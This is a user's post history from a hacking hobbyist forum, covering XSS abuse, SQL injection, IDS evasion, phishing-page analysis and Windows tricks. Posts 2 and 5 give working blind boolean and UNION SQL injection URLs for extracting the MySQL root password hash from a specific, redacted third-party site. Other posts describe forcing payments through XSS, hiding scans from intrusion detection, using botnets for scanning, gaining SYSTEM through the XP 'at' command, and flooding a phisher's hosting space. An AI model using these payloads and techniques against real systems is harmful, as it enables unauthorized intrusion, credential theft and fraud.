\xC3

Members
  • Content count

    67
  • Joined

  • Last visited

Everything posted by \xC3

  1. Since you can use javascript and jquery with XSS, one tactic you can use is kind of like session hijacking and cross site referral forgery: Because your XSS on the site has the site name in the referrer information, you can automate form submissions on the affected site in the context of the logged-in user. For example, if an attacker found an XSS vulnerability in a payment processing web site, the attacker could use the vulnerability to send a malicious link to a logged-in user, which would then (using jscript or jquery) force the logged-in user to send money to the attacker via a form submission. This would also bypass referrer checking in most cases because the domain name would be in the referrer URL. Click-n-pwn. NOTE: This is not something that I condone in any way. I am simply explaining the full potential of an XSS vulnerability.
  2. You may want to try some boolean enumeration. See if the following works: hxxp://*****.com/poll.php?id=1%20AND%201=1 hxxp://*****.com/poll.php?id=1%20AND%201=0 The first should return whatever is usually there, and I'm guessing that the second should make no "poll" display. If you get this far, you have a working true and false. If this is the case, then, hxxp://*****.com/poll.php?id=1%20AND%20((ASCII((MID((SELECT%20Password%20FROM%20mysql.user%20WHERE%20user='root'%20LIMIT%200,1),1,1))))>96) Will tell you if the ascii code of the first character of the password is greater than 96 (lowercase a or above). If this works, You'll want to break out an ascii chart to cross compare. You should be able to modify the above query to properly isolate the correct values. I am not 100% sure about MySQL 5.0, but I believe the hash to be stored in hexadecimal, meaning your possible ascii codes will be 97-102 (a-f) and 48-57 (0-9). You may also want to find the length of the hash with the following comparison: hxxp://*****.com/poll.php?id=1%20AND%20((LENGTH((SELECT%20Password%20FROM%20mysql.user%20WHERE%20user='root'%20LIMIT%200,1)))>10) This will "return true" if the length of the hash is greater than ten. Happy hacking. Hope this helped. EDIT: SQL Syntax EDIT: One more thing -- you may want to check out the grants table. This will tell you if it's A) world accessible or you have the privileges you want. Just a thought.
  3. If it were unary, there'd ONLY be 0. Binary (bi) from the latin (two) or language of two.. 0 and 1 are two different values, hence "binary". All data is stored in binary format. All ascii codes have there own binary equivilent. Same goes for hex, etc ad nauseam. All code executes in RAM or Cache as binary. All packets are formatted in binary at one layer or another, especially if you inspect such low level as ethernet frames etc. IP addresses are binary (in the packet level). As everything with a computer is deterministic, binary is what makes it so. The common thread, as it were.
  4. Wow. Judging from the fact that writing exploits is part of legitimate research for security firms, writing them shouldn't be illegal. I'd have to say using them on any gear other than your own is and should be, however writing them and testing them is a necessary part of vulnerability confirmation: If you discover a vulnerability in code, you are not 100% sure its vulnerable until you have written a test exploit. Even though this may only echo "I am vulnerable" back to the attacker, you've gotta do it as a researcher. Just part of life. Secondly, while I agree that viruses, released into the public, are both hazardous and problematic, and that releasing them, to the public, should be highly illegal: Many distributed computing systems and artificial intelligence research machines have very worm like properties about the way they distribute themselves across a network. Technically because certain behavioral patterns and codes are being copied and quantified, this too can be considered a virus. As a result, I /don't/ think that /writing/ anything should be illegal, simply deploying it into an environment which can allow it to affect anything outside of your own network should be strictly prohibited (and right now, as I see it, is). In any case, no one likes conficker, and if you're a researcher with /that much/ time on your hands, it might be worth the $250k to analyze and trace. Nmap has also made it somewhat easy to pinpoint infected machines. Does have some patch detection bugs though
  5. Well you may just want to try making it have an error. Usually if verbose errors are enabled it will freak out and give you the full path For example: hxxp://anysiterunningw0rdpr3s$.com/wp-settings.php Dig around for an includes directory or something. You can almost always get it to fork an error of some sort. EDIT: Seeing as your root, you may want to check out the mysql.user and the INFORMATION schema tables: Since you're using the particular versions that you are: http://dev.mysql.com/doc/refman/5.0/en/inf...ion-schema.html might even try : hxxp://*****.com/poll.php?id=1 union select null,null,(SELECT Password FROM mysql.user WHERE host='localhost' AND user='root'),null– hxxp://*****.com/poll.php?id=1 union select null,null,(SELECT Password FROM mysql.user WHERE user='root' LIMIT 1),null– (SELECT Password FROM mysql.user WHERE host='localhost' AND user='root') OR (SELECT Password FROM mysql.user WHERE user='root' LIMIT 1) May return a SQL 5.0 password hash, since you are running as root, after all.
  6. Because you're attacking the 'network' and not the 'host' or 'service' behind a 'port' you may want to think about the fact that networks are supported by network devices such as routers, switches, firewalls, NAC solutions, etc. Network devices generally use protocols like SNMP, OSPF, HSRP, RIP, CDP, STP, ICMP, BGP, and I'm sure there are plenty that I'm forgetting. These protocols all have RFC's or "Requests For Comment" that dictate the specifications for communication using these protocols. Most of the time, network vulnerabilities (as opposed to server or software based vulnerabilities) are a result of mis-configured network devices or design flaws in the protocol handlers. When unauthenticated instructions can be sent to a network device, sometimes the network device does what it's told. This can cause all sorts of things, for example, if you find a BGP abuse, then you can specify another router as the border gateway. Hope this helps.
  7. The best place to leave them is by the smoker's bench.
  8. Thumbs.db is protected by the standard windows file/memory protection mechanism, NTLDR, which is why explorer just re-attribs stuffs when you view the folder. You might be able to attrib -r -s -h NTLDR (I think its in the root of the system drive (C:)) and then delete it, but if you do that you throw all the other file protection out the window. You also might be able to apply a binary patch to explorer that prevents it from re-attrib'ing stuff. Hope this helps.
  9. I highly doubt that, because browsers work by sending a request to the DNS Server then they talk directly with the IP address in stead of using the domain or URL. If you want to spend time home-brewing an application, then I guess it would be possible by monitoring all the DNS requests and blocking traffic to IP Addresses which were not sent back from a DNS server. In any case, this is still easy to bypass.
  10. I don't have an iPod, but if you can ssh into it, you should be able to 'dd' the drive and create an image. Maybe pipe it through telnet or netcat with a listening port on your local machine that pipes it into a file...
  11. Hay! I'm heading out tonight, should be there around 9-10 PM.
  12. Yeah, I noticed that myself. There are a couple other threads I've seen from members that have recently joined that make me think binrev is currently being hit by hordes of trolls.
  13. I did a little research on that hosting site and they don't give you /too much/ space for free. makes me wonder if we could fill up his entire directory with like 50 mb of text logs so he can't do this stuff anymore..
  14. For starters, lets notice that the URL in the URL bar doesn't contain Binrev.com. Now here's to the code : <input type="hidden" name="act" value="Login" /> <input type="hidden" name="CODE" value="01" /> <input type="hidden" name="s" value="ece7a530afe53e91ae89129751338828" /> <input type="hidden" name="referer" value="http://www.binrev.com/forums/index.php?act=post&do=reply_post&f=5&t=38443" /> <input type="hidden" name="CookieDate" value="1" /> <h4>You are not logged in, you may log in below</h4> <div class="fieldwrap"> <h4>Your account username</h4> <input type="text" size="20" maxlength="64" name="UserName" /> <h4>Your account password</h4> <input type="password" size="20" name="PassWord" /> <p class="formbuttonrow1"><input class="button" type="submit" name="submit" value="Log In" /></p> </div> </form> First, lets notice that the form method is "GET" not "POST". The real code to the forum is as follows : <form action="http://www.binrev.com/forums/index.php?act=Login&CODE=01" method="post" name="LOGIN" onsubmit="return ValidateForm()"> <input type="hidden" name="referer" value="http://www.binrev.com/forums/index.php?" /> <div class="borderwrap"> <div class="maintitle"><img src='style_images/green/nav_m.gif' border='0' alt='>' width='8' height='8' /> Log In</div> <div class='row2'> <div class="formsubtitle">Please enter your details below to log in</div> <div class="errorwrap" style='margin-bottom:0px;padding-bottom:0px'> <h4>Attention!</h4> <p>You must already have registered for an account before you can log in.<br />If you do not have an account, you may register by clicking the 'register' link near the top of the screen</p> <p><b>I've forgotten my password! <a href="http://www.binrev.com/forums/index.php?act=Reg&CODE=10">Click here!</a></b></p> </div> </div> <table class='ipbtable' cellspacing="0"> <tr> <td width="60%" valign="top" class='row2'> <fieldset> <legend><b>Log In</b></legend> <table class='ipbtable' cellspacing="1"> <tr> <td width="50%"><b>Enter your user name</b></td> <td width="50%"><input type="text" size="25" maxlength="64" name="UserName" /></td> </tr> <tr> <td width="50%"><b>Enter your password</b></td> <td width="50%"><input type="password" size="25" name="PassWord" /></td> </tr> </table> </fieldset> </td> <td width="40%" valign="top" class='row2'> <fieldset> <legend><b>Options</b></legend> <table class='ipbtable' cellspacing="1"> <tr> <td width="10%"><input class='checkbox' type="checkbox" name="CookieDate" value="1" checked="checked" /></td> <td width="90%"><b>Remember me?</b><br /><span class="desc">This is not recommended for shared computers</span></td> </tr> <tr> <td width="10%"><input class='checkbox' type="checkbox" name="Privacy" value="1" /></td> <td width="90%"><b>Log in as invisible</b><br /><span class="desc">Don't add me to the active users list</span></td> </tr> </table> </fieldset> </td> </tr> <tr> <td class="formbuttonrow" colspan="2"><input class="button" type="submit" name="submit" value="Log me in" /></td> </tr> <tr> <td class="catend" colspan="2"><!-- no content --></td> </tr> </table> </div> </form> So I mean, look at the difference. Notice the action in the first code is "next.php" and that's not at all what the action is in the real src to the site. There are other differences between the codes, which I don't have to point out now - I'm sure its becoming readily apparent.
  15. This kid is a lame phisher.

  16. I see, yeah I posted that before heading out to lunch. Hadn't had the time to do the review myself yet. Apon further review I found the real URL and read the source to the page myself, makes me wonder if he's using an SQL powered backend to store user data, if so maybe bobby tables... I never really gave it my real credentials, that's why I wondered how I was actually logged in if the session was incrementing without a cookie heist. EDIT : Its a get request to a file called next.php..... Includes a referrer url for the redirect. And apon further review, http://h1.ripway.com/acedaarcher/ is another redirect page for some other forum. This guy seems to have gone around the block trying to access other security researcher/hacker hobbyist information.
  17. Hmm, I wonder if he can actually harvest cookies with this stuff. I went there and typed in lol@ for the username and you for the password, and it kept the urlhawk URL in the URL bar but all of a sudden I was logged into binrev. Obviously I changed my password, but I'm curious now. I'm guessing its a pretty standard CURL scam anyway....
  18. I'm definitely attending.
  19. :glare: WTF? The most advanced config with Ubuntu I can think of is like SELinux + PaX + GrSec. Maybe some sort of virtualization application like Xen or VMWare. I wouldn't even /really/ trust them at a blackhat conference. There is still room for error. You know, other people write those exploits on milw0rm and metasploit. Ever considered writing your own? You just have to know how exploits work and quit using everyone else's tools. Build your own tools when attempting to crack systems that you may think are hardcore, you'll get much further much more quickly. My advice : Go take some time off to learn about fuzzing and machine code. Forget about breaking into your friends box and actually learn what your tools are doing, why they work on some systems, why they don't on others -- and I don't just mean "Well that's because this is for version blah and this is for version blah", no.... I mean exact your understanding the vulnerabilities, how a buffer overflow works, figure out what the %eip register is on your processor, break out a debugger... Go from there. Maybe buy some assembly books and hit up the intel arch manuals while you're at it. When you find your first few zero-day, then maybe you can go back and wargame with your friend...
  20. Submit a bug to Mao on the oxid.it support forums. That's my suggestion. If Cain were open source, I'd tell you to just write a patch, but because its not, you'll have to ask Mao to do so.
  21. Sometimes tools do what you do when you check a site by hand automatically. Usually though, these tools are closed-source. You send your own requests to a webserver, usually GET and POST requests (sometimes with cookie wierdness), when you check by hand, right? Why couldn't a program just send the same types of requests, then compare the file outputs? No reason it couldn't. That's what some of the proprietary (and maybe?) open source tools do. I don't really use tools other than custom apps written by myself or my friends, but generally speaking my tools work just as well as testing by hand. They simply automated the process.
  22. As this thread is about pen-testing, I'd have to say any /authorized/ pen-test is usually /expected/ to set off a few alarms. Also, not all nmap and nikto scans are loud. I suggest reading the docs to learn about evasion options. For example, on nikto, -evasion 9 will usually hide from network layer IDS systems if the remote host is vulnerable to session splicing. The attack will still be logged, but alarms won't be set off. Not from the network layer anyway. Another trick to hide from the network layer is to simply run scans over HTTPS. Sniffers (except certain IPS systems which are programmed to do an SSL man in the middle) aren't programmed to decrypt the traffic on the fly. A decent system will also rely on a HIDS/HIPS system, which sometimes will be set off and other times won't be. There are plenty of other options too, and if you're going to say test it manually, how do you justify the amount of time it takes go test all ports? I fail to understand. Often times the /decent/ black hats (sorry kingospam, but you said "the ones who haven't been busted", so I'm assuming blackhats) don't even scan things by hand; they do a distributed scan from 65,355 botnet nodes, each node testing a single port, then reporting back to the botnet's controller or peer-to-peer with each other until they reach some sort of hub. This technique is also used to evade an application called "Port Sentry", which is what is running on those systems that you scan with nmap which seem to have EVERY port open for some reason. There are other ways to hide your connections, like out-of-sequence spoofed fin/rst/ack connection closing (if you make it look like the two boxes "hung up", then most sniffers just quit recording the rest of the traffic, similar to the 2600 hz tone, except for computers). It is possible to pen-test without commercial tools, and as kingospam mentioned, you are oftentimes more successful IF you know what to test by hand. A lot of times you do an automated scan as a preliminary, and then afterwards you check the "fuzzy spots" by hand, things like SQL injection vulnerabilities and other common vulns. Sometimes if nmap returns a version to you, you can simply google up an exploit and use that. Blind fuzzing can be productive as well but very time consuming, but remember that big packetslaps are pretty obvious to NIDS systems. Books and resources? Not really that I can think of. Maybe hit up some RFC's, learn web applications programming, and perhaps even grab a copy of the shellcoder's handbook. And always remember that the maximum allowable stack size on a little endian processor is limited to 16 megabytes.
  23. If you are using windows XP, try to use the "at flaw" to get system priviledges : C:\>at [military timestamp one minute from now] /interactive taskmgr.exe Do this without having the task manager open. Now as system, you should be able to hit "new task" from the task manager and open a different cmd.exe. Inside that cmd.exe, after killing all of the iexplore.exe processes : C:\PROGRA~1>attrib -r -s -h iexplore.exe C:\PROGRA~1>del iexplore.exe If the iexplore processes start too quickly, try putting the following into a batch file : @echo off taskkill /f /im iexplore.exe taskkill /f /im iexplore.exe taskkill /f /im iexplore.exe taskkill /f /im iexplore.exe taskkill /f /im iexplore.exe taskkill /f /im iexplore.exe taskkill /f /im iexplore.exe cd \ cd PROGRA~1 attrib -r -s -h iexplore.exe del iexplore.exe Put that in killer.bat and then just execute killer.bat as system. Hope it helps -- may or may not work, post back.
  24. I believe a lot of your questions have already been answered in this thread.
  25. Well a remote control for an RC car isn't near the same as an mp3 player. As for the remote control example, I'm pretty sure that can be done explicitly through circuitry, different signals hitting different receivers triggering different circuits. As far as the mp3 player, it would need a media type (flash, sd, etc) and a way to read that media, and if you planned on having some sort of digital display something to interface with that as well. I believe this can be hard-wired for the most part, but there is sure to be some sort of embedded programming involved. As for the embedded programming, its not for all devices, except those which integrate with computers (for the most part). The best languages to learn embedded programming in are C and assembly. Hope this helps.